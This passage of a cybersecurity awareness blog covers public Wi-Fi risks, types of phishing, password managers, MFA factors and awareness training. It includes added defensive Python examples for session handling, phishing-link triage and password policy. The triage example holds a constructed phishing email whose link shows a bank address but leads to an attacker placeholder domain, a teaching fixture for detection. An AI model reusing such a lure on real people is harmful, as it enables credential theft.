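"""Server-side session handling that limits session hijacking. Added example,
not from the original post. SESSION_TTL and the cookie attributes are assumed
values a site operator would choose."""
import secrets
import time

SESSION_TTL = 15 * 60   # idle timeout in seconds (assumed)


def parse_cookie(header: str) -> dict:
    """Turn a 'Cookie:' header value such as 'a=1; session=xyz' into a dict."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


class SessionStore:
    """Holds the server-side state that a cookie's session ID points at."""

    def __init__(self, clock=time.time):
        self._sessions = {}      # session id -> {"user": ..., "last_seen": ...}
        self._clock = clock      # injectable so the timeout can be tested

    def create(self, user: str) -> str:
        # 256 bits of randomness: an ID that cannot be guessed or enumerated.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "last_seen": self._clock()}
        return sid

    @staticmethod
    def set_cookie_header(sid: str) -> str:
        # Secure: the browser only sends it over HTTPS, so it cannot be read
        # off an open Wi-Fi network. HttpOnly: page scripts cannot read it.
        # SameSite=Strict: it is not attached to requests from other sites.
        return (f"Set-Cookie: session={sid}; Secure; HttpOnly; "
                f"SameSite=Strict; Path=/; Max-Age={SESSION_TTL}")

    def resolve(self, cookie_header: str):
        """Return the logged-in user for a request's Cookie header, or None."""
        sid = parse_cookie(cookie_header).get("session")
        session = self._sessions.get(sid)
        if session is None:
            return None
        if self._clock() - session["last_seen"] > SESSION_TTL:
            del self._sessions[sid]   # idle too long: a captured ID is now dead
            return None
        session["last_seen"] = self._clock()
        return session["user"]

    def logout(self, sid: str) -> str:
        # Deleting the server-side entry is what really ends the session.
        # Only clearing the browser cookie would leave a copied ID valid.
        self._sessions.pop(sid, None)
        return "Set-Cookie: session=; Max-Age=0; Secure; HttpOnly; SameSite=Strict; Path=/"


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice")
    print(store.set_cookie_header(sid))
    print("before logout:", store.resolve(f"session={sid}"))
    store.logout(sid)
    print("after logout :", store.resolve(f"session={sid}"))
```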
In Conclusion
There are many other threats out there that need to be covered, but we will take things one step at a time. The more devices we hold, the more points of entry we leave open. Cybersecurity attacks and breaches happen quite frequently, and the scary part is that we might not even know one is happening until it reaches the news. Prevention is one of the best ways to protect ourselves and our systems from attack, and we cannot prevent what we do not understand. This is why cybersecurity awareness is crucial for all users. We hope to keep bringing you cybersecurity awareness content here at Cybersecurity Central to help you stay protected online.
AUG 31, 2022
Public Wi-Fi is Not Your Friend
by Eula Chua
August 31, 2022
I have been deceived, and probably, so have you.
There was a time in life when my friends and I would get excited when Wi-Fi became publicly accessible in certain coffee shops, restaurants, airports, and libraries. This meant that we didn’t have to spend extra money to pay for cellular data overages.
We would instantly connect wherever public Wi-Fi was available, as if we had hit the jackpot. Okay, maybe that’s a little exaggerated. But it defined the quote, “the best things in life are free.”
That quote, however, does not exactly hold true. It should have been, “the free things in life come with consequences.” This is where convenience versus security comes to mind.
Public Wi-Fi is not our friend. Connecting to it puts us at risk. At your own discretion, you can use it when you have no other option, but if at all possible, avoid it.
I’ll tell you why.
There are probably hundreds of people passing through the same location as you. With these hotspots, any one of those people can connect, and any one of them may be a cyber criminal.
Another point to think about is how the public Wi-Fi was configured. Was it properly secured? Could anyone gain access to the network as an admin? Maybe the default settings on the router were never changed.
Here are a few risks that may be encountered through using public Wi-Fi:
Identity Theft
Data Breach
Man-in-the-Middle Attack (aka On-Path Attack)
Eavesdropping/Packet Sniffing
Session Hijacking
Unencrypted Connections
Malware Distribution
We will go over each one of these in a future post. But for now, what can we do to protect ourselves and mitigate the risks that we can control?
Here is a list compiled by Get Cyber Safe, a Canadian national public awareness campaign:
Turn off the Wi-Fi on your device in a public Wi-Fi zone if you’re not connected to the Internet
Ensure that a firewall is enabled
Be careful what you browse and avoid visiting websites that contain sensitive information
Use a VPN (virtual private network) that encrypts data and allows you to browse under a secure network
Be wary of shoulder surfers that may be watching your screen
Ensure that websites you visit are using HTTPS, not HTTP
Do you have other recommendations, tips, or tricks on how to protect ourselves online? Visit us on social and let us know!
Below are some great resources and studies to check out regarding public Wi-Fi:
- https://irjhis.com/paper/IRJHISIC2203054.pdf
Until next time, stay safe out there… and online!
AUG 24, 2022
Let’s Talk About Phishing
by Eula Chua
August 24, 2022
Did you know there are different kinds of phishing attacks? First, let’s define what phishing means.
According to Phishing.org, phishing is “a cybercrime in which a target or targets are contacted by email, telephone or text message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking and credit card details, and passwords.”
Phishing is one of the most common ways for cyber attackers to target people online via email. Many times, this type of attack is used on specific groups of people or high-profile individuals to gain personal information and most of the time, for financial gains.
As phishing continues to adapt, cyber attackers have found other communication channels to trick users into providing information. Some examples are voice messages, SMS text messages, and phishing through search engines. There are many ways phishing techniques are conducted; however, in today’s blog, we will focus on the different types: email phishing, vishing, smishing, spearphishing, and whaling.
Email phishing
When we hear “phishing”, we automatically think of email phishing. That’s because it is the most common technique used to conduct a phishing attack. If you check the spam/junk folder of your inbox right now, you might notice emails from unknown addresses with odd subject lines. There could also be emails from people you think you know. Remember that the purpose of phishing is to trick users into revealing personal information by making them believe the sender or organization is legitimate. How is this done? Phishing emails often contain links that lead to a malicious website that appears legitimate. These websites may either deliver a trojan or present a fake login form that captures your credentials. Other emails may carry malicious attachments.
Vishing aka. Voice phishing
Vishing is a combination of “voice” and “phishing”. This occurs when a “phisher” utilizes a phone system to lure their targets into providing their personal information or credentials, mainly for financial gain. VoIP (Voice over IP) technology is often used for these attacks because it’s easier for the attacker to pretend that they are from an actual known company, by spoofing their caller ID.
Smishing aka. SMS phishing
“SMS” and “phishing” make up the term “Smishing”. Rather than it being done through email, phishing is done via text message. With the same purpose of gaining personal or financial information from a target, malicious links and attachments can also be sent through text. Smishing can also be used to obtain verification codes if the target’s phone is used for multi-factor authentication for their credentials.
Spearphishing vs. Whaling
If you get these two terms mixed up, you are not alone. Let’s go over the main differences.
Spearphishing is a specific type of phishing in which an attack is conducted on a particular person or specific groups of users, most often within an organization.
Whaling is a specific type of spearphishing, where a high-level executive is either the victim or the one being impersonated.
There are so many different ways a phishing attack can be carried out. End-user security awareness is crucial to our online safety and privacy, as phishing attempts occur every minute of every day.
As end-users, how can we do our part to prevent these phishing attacks from progressing?
First and foremost, staying informed about these types of attacks helps build awareness. Knowing what we are up against helps us find methods of preventing these attacks from succeeding.
Stay curious and think before you click. If you’re not familiar with the sender and the purpose of the email, do not click the link. If you think you might know the sender but are unsure why they may be sending you an attachment, directly contact the person via phone to verify that they actually intended to send that email.
Never give out personal or financial information to people you don’t know over the internet and especially through email.
Double check the URL of the link. Hover your mouse over the link (do not click it) and see whether the URL actually points to the legitimate website.
Verify the website’s security by ensuring the URL starts with “HTTPS” and shows a lock icon beside it. Keep in mind that HTTPS only tells you the connection is encrypted, not that the site is who it claims to be, so treat it as a minimum bar rather than proof of legitimacy.
Do not trust pop-ups. Sometimes they are disguised as part of the website you intended to visit. If you’re not sure what the pop-up is about, close the window immediately.
Use anti-virus software or enable a spam filter that helps block malicious emails and websites.
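The “hover over the link” and “check for HTTPS” tips above can be performed programmatically over an email’s HTML, which is handy when triaging reported messages. This is an added example, not code from the original post; the sample email, the sender domain, and the example-bank.com / attacker-example.net names are all constructed placeholders.

```python
"""Triage of the links in a suspicious HTML email, reproducing the checks a
reader does by hovering over a link. Added example, not from the original post.
SAMPLE_EMAIL_HTML and all domain names in it are constructed placeholders."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the first link *displays* the bank's address but its
# href goes elsewhere over plain HTTP; the second link is legitimate.
SAMPLE_EMAIL_HTML = """
<p>Your account has been locked. Please verify your details at
<a href="http://secure-login.example-bank.com.attacker-example.net/verify">
https://www.example-bank.com/verify</a> within 24 hours.</p>
<p>Questions? Visit <a href="https://www.example-bank.com/help">our help centre</a>.</p>
"""

# Does the visible link text itself look like a URL or a domain name?
LOOKS_LIKE_URL = re.compile(r"^(?:https?://)?[\w.-]+\.[a-z]{2,}(?:[/?#]\S*)?$", re.I)


class _LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs from every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def host_of(url: str) -> str:
    """Lower-cased hostname of a URL, also accepting bare 'www.x.com/path'."""
    url = url.strip()
    if "://" not in url:
        url = "//" + url
    return (urlsplit(url).hostname or "").lower()


def in_domain(host: str, domain: str) -> bool:
    """True only for the domain itself or a real subdomain of it, so a host
    like 'example-bank.com.attacker-example.net' does NOT count."""
    return host == domain or host.endswith("." + domain)


def analyse_links(email_html: str, sender_domain: str):
    """Return [(href, visible_text, [reasons])]; an empty reason list is clean."""
    parser = _LinkExtractor()
    parser.feed(email_html)
    findings = []
    for href, text in parser.links:
        parts = urlsplit(href)
        host = (parts.hostname or "").lower()
        reasons = []
        if parts.scheme.lower() != "https":                 # "starts with HTTPS"
            reasons.append("not HTTPS")
        if LOOKS_LIKE_URL.match(text) and host_of(text) != host:   # hover check
            reasons.append(f"shown as {host_of(text)} but goes to {host}")
        if not in_domain(host, sender_domain):
            reasons.append(f"{host} is outside the sender's domain {sender_domain}")
        findings.append((href, text, reasons))
    return findings


if __name__ == "__main__":
    for href, text, reasons in analyse_links(SAMPLE_EMAIL_HTML, "example-bank.com"):
        verdict = "OK" if not reasons else "; ".join(reasons)
        print(f"{text!r} -> {href}\n   {verdict}")
```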
If you would like to learn more about phishing, here are some great resources to visit:
- https://www.getcybersafe.gc.ca/en/blogs/phishing-introduction
- https://www.microsoft.com/en-ca/security/business/security-101/what-is-phishing
- https://cybersecurityguide.org/resources/phishing/
- https://www.phishprotection.com/resources/what-is-phishing/
AUG 17, 2022
Password Management 101
by Eula Chua
August 17, 2022
We’re exposed to an ocean of information, to the point where I can’t even count how many times I’ve seen a post or meme about passwords written on paper notes. For many of us in the technical field, it’s second nature to know that this is something to be avoided. It only really hits us when we see another person do the forbidden thing. Then it leaves us in shock.
This happened to me the other day. While helping one of the most patient customers I have served, I couldn’t help but notice that her passwords were stored on a piece of paper tucked in her wallet. I hadn’t realized.
You may ask why I’m bringing up this story.
–
It’s always been a battle between convenience and security.
We’re in a day and age where we have to create multiple accounts for multiple online services and platforms. When it comes to passwords/passphrases, it’s easier for us to write them down on a piece of paper or create a password we can easily memorize. When it comes to convenience, time is valuable and although we want things quick and ready to use, security is on the line. When it comes to security, there are so many steps we need to comply with. How can we find the balance between convenience and security?
Although it may take time before we get to that point, let’s take charge of what we have control of today. As end-users, we are the first line of defense. A big focus we can work on is practicing proper password hygiene.
Before we go and start changing passwords right away, let’s take a moment to reflect on these questions:
Have I been writing down my passwords on paper or on a digital note?
Am I using a password manager?
Are my passwords all the same?
Did I use personal information as my password or a part of my password, such as my date of birth, my pet’s name, my favourite colour etc.?
Do I have a mix of characters, numbers, and symbols in my password?
How long is my password?
Am I using multi-factor authentication in my accounts?
Have these questions got you thinking about your current passwords? If so, don’t worry. You are not alone. It may seem overwhelming to have to change every password for every single account. Know that it will take time. Something that has worked for me is utilizing a password manager to keep track of all my accounts and passwords. Whenever I come across an account I have to log in to, I would add it to the password manager, reset my password, and store it.
Before I continue, you may ask, “How does a password manager work?”
Essentially, a password manager encrypts the passwords it stores (the “vault”), so the data stays protected on your device and whenever it is transmitted online, and is very difficult to crack. While many passwords are stored, the main way to unlock them is a master password. This means we only need to remember one strong password rather than hundreds. Combining this with multi-factor authentication makes it even more secure. Password managers are one of the safest and most secure tools we can use. Nonetheless, complex password requirements should not be neglected.
“What are the complex password requirements we should follow to ensure that they are harder to figure out?”
Some common ones, which you may have also read when creating passwords for new accounts are:
Contains lowercase characters
Contains uppercase characters
Contains digits (0-9) and symbols (~!@#$%^&*...)
Having a length of 12-24 characters
No common names or dictionary words
Use passphrases rather than passwords
No sequences of more than 4 digits in a row
No previously used passwords
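The requirements above can be turned into a checker that reports exactly which rule a candidate password fails. This is an added example, not code from the original post; COMMON_WORDS is a tiny constructed sample standing in for a real dictionary list, and the PBKDF2 iteration count used for the reuse history is an assumed value.

```python
"""Checker for the password complexity rules listed in the post. Added example,
not part of the original post. COMMON_WORDS is a constructed sample; a real
deployment would load a large dictionary/breached-password list. Previous
passwords are kept as salted slow hashes, never in plaintext."""
import hashlib
import re
import string

MIN_LEN, MAX_LEN = 12, 24      # "having a length of 12-24 characters"
MAX_DIGIT_RUN = 4              # "no sequences of more than 4 digits in a row"
PBKDF2_ROUNDS = 100_000        # assumed value; tune to your hardware

# Constructed sample wordlist for the "no common names or dictionary words" rule.
COMMON_WORDS = {"password", "welcome", "summer", "winter", "qwerty",
                "letmein", "dragon", "monday", "toronto"}


def history_entry(password: str, user_salt: bytes) -> str:
    """How an old password is recorded in the reuse history: a salted PBKDF2
    hash, so the history is not itself a list of usable secrets."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), user_salt,
                               PBKDF2_ROUNDS).hex()


def check_password(password: str, history=(), user_salt: bytes = b"") -> list:
    """Return the rules the password fails; an empty list means it passes."""
    failures = []
    if not any(c.islower() for c in password):
        failures.append("needs a lowercase letter")
    if not any(c.isupper() for c in password):
        failures.append("needs an uppercase letter")
    if not any(c.isdigit() for c in password):
        failures.append("needs a digit")
    if not any(c in string.punctuation for c in password):
        failures.append("needs a symbol")
    if not MIN_LEN <= len(password) <= MAX_LEN:
        failures.append(f"length must be {MIN_LEN}-{MAX_LEN} characters")
    # \d{5,} with the default MAX_DIGIT_RUN: five or more digits in a row
    if re.search(rf"\d{{{MAX_DIGIT_RUN + 1},}}", password):
        failures.append(f"no more than {MAX_DIGIT_RUN} digits in a row")
    # Dictionary words are matched case-insensitively anywhere in the password,
    # so "Summer2023!!" is still caught.
    hits = sorted(w for w in COMMON_WORDS if w in password.lower())
    if hits:
        failures.append("contains common word(s): " + ", ".join(hits))
    if history and history_entry(password, user_salt) in history:
        failures.append("previously used password")
    return failures


if __name__ == "__main__":
    for candidate in ("password12345", "Summer2023!!", "Correct-Horse-Battery-9"):
        result = check_password(candidate)
        print(f"{candidate!r}: {'passes' if not result else '; '.join(result)}")
```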
Now that we have gone over password complexity requirements and a brief introduction to password managers, here are some notable ones you can start with:
Bitwarden (Bitwarden Open Source Password Manager)
Works with Windows, MacOS, iOS, Linux, Android, web, browser extensions, command line
Open source
Has 2FA (two-factor authentication)
Offers both a free tier and a paid tier (free tier goes a long way)
Unlimited password storage
Accessible across multiple devices
LastPass (#1 Password Manager & Vault App with Single-Sign On & MFA Solutions)
Supports multiple browsers and platforms
Has 2FA
Can be used for personal or business purposes
Can use a passwordless login
Includes dark web monitoring
Offers both a free tier and a paid tier (free version does not sync passwords across devices)
1Password (Password Manager for Families, Businesses, Teams | 1Password)
Wide variety of browser support
Supports 2FA
1GB storage space
Shared password feature up to 5 family members
Password auditing
14-day free trial and paid tier only
There are lots of options out there so make sure to do more research and find one that suits your needs.
Changing passwords from multiple logins can take up lots of time and can be overwhelming. Remember to start small and change what you can. Over time, you’ll be able to meet the complexity requirements for every password. The most important part to note here is that practicing password hygiene prevents future compromises. Let’s continue to do our part and stay safe online.
AUG 10, 2022
Multi-Factor Authentication: Factors In-depth
by Eula Chua
August 10, 2022
Almost everything on the Internet requires us to sign up for an account, whether it’s creating an email account, a social media profile, or even an account for an e-commerce website. Yet so many data breaches and phishing attacks occur, often without our knowledge. Check out this article by Nasdaq on skyrocketing data breaches:
Data Breaches Continue to Skyrocket in 2022
What can we do to protect ourselves on our end?
Multi-Factor Authentication (MFA).
Multi-Factor Authentication is an authentication method that helps verify that the person logging in to an account is its rightful user. A username and password are an authentication method on their own, but having only one way to authenticate an account does not fully prevent unauthorized users from accessing it. MFA adds extra layers of protection to keep potential attackers from progressing further.
There are 7 Factors/Attributes of Authentication that we will delve into:
3 Factors:
- Something you are
- Something you have
- Something you know
4 Attributes:
- Something you do
- Something you exhibit
- Somewhere you are
- Someone you know
1. Something you are
This factor requires information that is you and only “you”. By this, we mean biometrics. This mainly comes in the form of scanning physical traits, such as your face, retina, fingerprint, thumbprint, voice identification, palm, and more. Do you own any Apple devices? If so, biometric scanning is something you might already be familiar with. Think of Face ID and Touch ID.
2. Something you have
This type of authentication factor asks for something a person physically carries, such as a token key. A token key is a physical device that generates numbers to help confirm that the person logging in is (hopefully) authorized. Other examples are ID smart badges, a physical key, an authentication app on your phone, and common access cards (CACs).
One-time passwords (OTPs) are one of the common security methods used for MFA and are self-explanatory—use the password once and it’s done. The app generates a new password each time a login is required. Two types of OTP methods are the Time-based one-time password (TOTP) and the HMAC-based one-time password (HOTP). Here’s a quick comparison.
TOTP
- Time-based/timestep: the temporary password is only valid within a certain amount of time (usually 30-60 seconds)
- Examples: Google Authenticator App, Microsoft Authenticator App, SecureAuth App
HOTP
- Counter-based: the token and the server share a counter that increments by one each time a password is generated and validated; the password does not expire with time, only when it is used
- HMAC stands for Hash-based Message Authentication Code; HOTP is an event-based one-time password method that computes an HMAC over the counter
- Example: Yubico’s YubiKey
3. Something you know
This factor refers to a piece of information you have memorized and can recall when required. Examples are personal security questions, a passphrase, or a personal identification number (PIN). The most common example is a password. Passwords are restricted pieces of information that most of us need to remember and retrieve when logging in to an account. Using a password as the sole method of authentication is not secure and leaves the account susceptible to compromise. This is where password managers come in. Many people still question the use of password managers, but for the most part, they have been one of the safest ways to store all your passwords in one place. We’ll talk more about proper password hygiene and password management in future blog posts.
4. Something you do
This is one of four attributes where a physical action is observed. Something is done, a gesture or a touch, in order to gain access or to unlock. A common example for this would be signatures, which can be challenging to reproduce due to the pen movement and its two-dimensional output.
5. Something you exhibit
In most cases, this isn’t commonly included as a factor of authentication but we’ll include it here. This is a specific trigger and response type, similar to “something you are”, to determine whether a response is true or false. An example of this would be a lie detector test.
6. Somewhere you are
This is a factor that uses a person’s location to authenticate a login. This uses Internet Protocol (IP) and Media Access Control (MAC) addressing to indicate where the login attempt is occurring. In some apps or social media platforms (Instagram or Facebook for example), this feature is used to alert the user if a suspicious sign-in attempt was done at an unfamiliar location. This way, the user can make a decision whether to reset their password or not.
7. Someone you know
Similar to “something you know”, this human authentication attribute is an old practice that involves another individual and a whole lot of trust. An example would be a chain-of-trust model, where people vouch for one another. Here’s a study if you would like to read more about this authentication factor: https://people.csail.mit.edu/rivest/BrainardJuelsRivestSzydloYung-FourthFactorAuthenticationSomebodyYouKnow.pdf
After going through all this, you might think that implementing MFA is intimidating, but in reality, it’s the total opposite. Most companies already have it implemented on their platforms; all that is needed is for you to turn it on. Next time you log in to any of your accounts, check the privacy and security settings to see whether MFA is offered. It can come in the form of an authenticator app (recommended), an SMS text message, a voice call, or e-mail verification. If you notice that one of your accounts does not offer MFA, consider suggesting it to that platform’s customer support or connecting with the IT team of your organization. As end-users, we have a big responsibility when it comes to protecting ourselves online. Starting with multi-factor authentication is a big step in preventing compromised accounts. Let’s keep security at the top of everyone’s mind.
If you’re not sure how to use a multi-factor authentication app, check out this video by Microsoft:
Set up multi-factor authentication with a mobile device in Microsoft 365 Business
Most Authenticator apps work similarly so make sure you use one that works for you. Thank you for reading!
Additional sources:
AUG 3, 2022
End-user Security Awareness Overview
by Eula Chua
August 3, 2022
The online space has no bounds. We are all connected in some way. From our smart TVs and Wi-Fi-enabled home appliances to computers and mobile devices, we are surrounded by technology everywhere we go, and we probably didn’t think we would become as dependent on it as we have. Yet we hear about data security breaches happening all over the world, to all types of organizations, and sometimes we don’t realize how close we are to being part of one. All it takes is one compromised account to open the gates.
Unfortunately, we ourselves have become the primary attack vector for threat actors, as mentioned in the SANS 2022 Security Awareness Report (https://www.sans.org/blog/sans-2022-security-awareness-report/). Companies and vendors can only do so much on their own; the rest is up to us. How can we improve from here? Security Awareness.
To specify, we will be focusing on information security and end-users in particular. We’ll do a quick overview.
According to Infosec Institute (https://resources.infosecinstitute.com/topic/security-awareness-definition-history-types/), “Security Awareness is a formal process for training and educating employees about IT protection.” Because most of us these days are working online, whether it’s for work, education, or personal purposes, security awareness is no longer limited to employees but to everyone.
What are some of the topics security awareness covers?
Topics may include, but are not limited to:
- Email usage
- Social engineering/Phishing
- Online Safety
- Privacy
- Proper password hygiene
- Common errors and how we can prevent them
- Mobile Device usage
- Encryption
- Social Networking
- AUP (Acceptable Use Policies)
Who does it involve or affect?
It involves all end-users, which may include:
- Executives
- Employees
- Students/Educators
- Grandparents/Parents
- Teenagers/Children
- You
Overall, it would be any target that a threat actor chooses to attack.
Where is security awareness needed/Where can it be found?
It is needed everywhere and anywhere we have Internet access. Nowadays, we’re seeing educational facilities run online end-user awareness campaigns, especially with the rise of hybrid learning. Most commonly, businesses and large organizations implement security awareness as formal training. One small mistake can range from doing little harm to severely affecting the business, whether through financial loss or business closure. Because budgets may be limited, small businesses that need training are often unable to implement it. Awareness of this gap is growing, and thankfully, online resources are now available to help small businesses get started. Here’s an article by Infosec Institute (https://resources.infosecinstitute.com/topic/security-awareness-training-can-protect-small-businesses/). For end-users in general, most well-known vendors and service providers offer free online security awareness training programs. Amazon offers a free cybersecurity awareness training course that anyone can take on their learning website: https://learnsecurity.amazon.com/.
When would security awareness training take place?
Within organizations, security awareness should ideally be an ongoing program; however, factors such as time, budget, and resources may keep it from being constant. Most businesses opt for monthly, bi-monthly, quarterly, or bi-annual employee training depending on those factors. Others may do it annually, but that may be a stretch.
How can we prevent ourselves from being attacked?
The key to prevention is being aware. Knowing what types of cyber attacks have been committed lets an individual or an organization prepare for what may occur. Then we can move on to taking action.
A few actionable topics to start with, that can be included and taught during security awareness training are:
- Setting up MFA (multi-factor authentication)
- Importance of password managers
- Strong password requirements (i.e. include uppercase, lowercase, numbers, and symbols; note that current NIST guidance in SP 800-63B puts more weight on length and on screening passwords against known-breached lists than on composition rules alone)
- Wi-Fi and VPN usage
- Tips on identifying phishing emails
- Keeping workstations and devices updated and patched
- Online privacy
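As an added illustration of the password-requirements item above (this is example code written for this post, not something from the original), the checker below applies a minimum length, the four character classes listed, a repeated-character check, and a lookup against a breached-password list. The breached set is a constructed stand-in; in a real deployment you would query a breach corpus such as the Have I Been Pwned k-anonymity API instead.

```python
"""Password policy checker: length, character classes, breach-list lookup.

Added example for this post, not code from the original page. The
BREACHED_PASSWORDS set is constructed for illustration only.
"""
import re

# Constructed sample standing in for a real breached-password corpus.
BREACHED_PASSWORDS = {"password", "p@ssw0rd", "welcome1", "qwerty123", "letmein"}

# Character classes commonly required by composition rules.
CHARACTER_CLASSES = {
    "uppercase": lambda c: c.isupper(),
    "lowercase": lambda c: c.islower(),
    "number": lambda c: c.isdigit(),
    "symbol": lambda c: not c.isalnum() and not c.isspace(),
}


def check_password(password, min_length=12, breached=BREACHED_PASSWORDS):
    """Return a list of reasons the password fails policy; empty means it passes."""
    problems = []

    # Length matters more than composition: longer passphrases resist guessing.
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")

    # Report every character class that is absent, in a fixed order.
    missing = [name for name, test in CHARACTER_CLASSES.items()
               if not any(test(c) for c in password)]
    if missing:
        problems.append("missing " + ", ".join(missing))

    # The same character repeated four or more times in a row is weak filler.
    if re.search(r"(.)\1{3,}", password):
        problems.append("contains a run of 4 or more repeated characters")

    # Compare case-insensitively: attackers try the common case variants too.
    if password.lower() in breached:
        problems.append("appears in a known breached-password list")

    return problems


if __name__ == "__main__":
    samples = ("P@ssw0rd", "Tr0ub4dor&3",
               "correct horse battery staple", "Blue-Kettle-Sings-42")
    for pw in samples:
        result = check_password(pw)
        print(f"{pw!r}: {'OK' if not result else '; '.join(result)}")
```

Running the samples shows the point of the caveat above: "P@ssw0rd" satisfies all four character classes yet fails on length and appears in the breach list, while the long lowercase passphrase fails only the composition rules. A policy that only counted character classes would accept the first and reject the second.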
Why is security awareness important?
Since the start of the pandemic in 2020, there has been a surge of employees working from home or hybrid. Many of the websites we visit nowadays also ask for our information, for example e-commerce, email lists, social media, and more. Because of this, so much of our personally identifiable information (PII) is being made available online in some way. With more of our activity happening online, users are more likely to encounter an attack and sometimes might not even know it. Tools can prevent attacks only to a certain extent. Raising awareness of common cybersecurity threats and risks helps users protect themselves and their assets, reduce anxiety, become less vulnerable, and be more prepared.
As mentioned earlier in this post, the online space has no bounds. Remember that behind every technology there is a human.
Security starts with you.
Resources to help you get started:
JUL 20, 2022
It Takes A Lot Of Courage
by Eula Chua
July 20, 2022My name is Eula. As a Cybersecurity Content Creator for Cybersecurity Central, I wanted to provide you with a glimpse of how I made it here.
It takes a lot of courage for someone to make a career switch or let alone, begin an entirely new career. If you’re one of these people, thank you for being a great example to those around you, for showing that where we are is not the “end-all-be-all” and that there is more for us out there.
A few years ago, I was transitioning out of a career in the Beauty industry, not exactly thinking about what was next for me but rather choosing to “go with the flow”. A friend offered me an interview in tech retail, and I got the job. It was something I would leverage until I made my next move. I thought of pursuing careers in the environmental, medical, behavioral, and educational routes, but every time, something would prevent me from continuing. One day, I sat in my Communications class (in a Medical program I was in at the time) and heard my professor say this to the entire class: “You’re in this program because you love it. You’re passionate about it. You want to be here.” Everything she was saying did not translate to how I was feeling. In fact, it was the opposite. I stuck to my commitment, finished Level 1 of that program, and left it. It was difficult to leave, but it was freeing.
During my discernment, I remembered someone telling me to reflect on my childhood and recall everything that sparked a light in me. A few of those moments were playing video games with my friends, hosting group chats, researching new technology, learning basic web development to create websites, and creating backgrounds and video edits using Adobe tools. All of that had to do with being on the computer. Everything else clicked for me: working on the computer, being surrounded by devices at work, seeing how much of our world has shifted into the digital age. Having a strong Community Outreach background with a desire to help people, being introduced to this side of tech by one of my good friends, and other factors that aligned, I found myself on the path of Cybersecurity. It took a while to get here, but I’m here and we’re just getting started.
I hope that our content brings value to you, whether it be something you implement personally or professionally or something you can relate to or learn from. If you have suggestions on topics you would like us to cover, feel free to send me a message on LinkedIn: https://linkedin.com/in/eulac-lipro